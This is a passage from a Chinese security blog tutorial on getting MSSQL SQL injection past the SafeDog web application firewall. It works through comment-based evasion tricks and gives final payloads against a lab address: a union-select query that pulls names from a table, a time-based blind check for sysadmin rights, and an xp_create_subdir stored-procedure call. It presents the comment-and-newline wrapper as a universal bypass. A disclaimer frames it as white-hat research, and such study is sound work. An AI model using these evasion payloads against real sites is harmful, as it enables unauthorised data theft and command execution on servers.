    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">union</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">unionselect </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
   </ol>

感觉是不是已经很绝望没办法绕过了,不妨试试注释,虽然mssql没有内联注释

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">union</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/*select*/</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">union</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/*!select*/</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">union</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/*!1select*/</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
   </ol>

我们试试闭合他,他还拦截不

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">union</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/*!1*/</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--*/</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
   </ol>

我们的最终的payload也构造好了

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 union/*!1*/select null,name,null from [info]--*/</span></code></span></span></p></li>
   </ol>

0x03 盲注与储存过程

我们前面讲过mysql的一个绕过手法就是注释加换行,这个其实在mssql中也是成立的,所以直接构造payload

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/</span></code></span></span></p></li>
   </ol>

储存过程

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1--/*%0aexec xp_create_subdir 'c:\text'--%20*/</span></code></span></span></p></li>
   </ol>

你可以把当做万能bypass语句,里面的任何代码安全狗都不会拦截

__________________________________________________________

声明:本文章来自404分享,仅供白帽子、安全爱好者研究学习,对于用于非法途径的行为,发布者及作者不承担任何责任。

我们建立了一个以知识共享为主的 免费 知识星球,旨在通过相互交流,促进资源分享和信息安全建设,为以此为生的工作者、即将步入此行业的学生等提供各自之力。为保持知识星球长久发展,所有成员需遵守本星球免费规则,鼓励打赏;同时保持每月分享至少一次资源(安全类型资源不限,但不能存在一切违法违规及损害他人利益行为),避免“伸手党”,即使新人我们也鼓励通过分享心得和笔记取得进步,“僵尸粉”将每月定期清理。

想加入我们的微信群,目前聚集了来自全球信息安全公司的CEO,安全部门主管,技术总监,信安创业者,网络安全专家,安全实验室负责人,公司HR,在这里你将获得高质量的技术交流空间,更多的内推高薪信息安全岗位,更多与安全大咖们面对面交流的机会。可以扫码添加我的微信,需提供真实有效的公司名称+姓名,验证通过后可加入···

人已赞赏
安全工具

zico靶机实战过程

2019-10-11 17:02:30

安全工具

网络安全学习路程随笔分享

2019-10-11 17:02:43

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索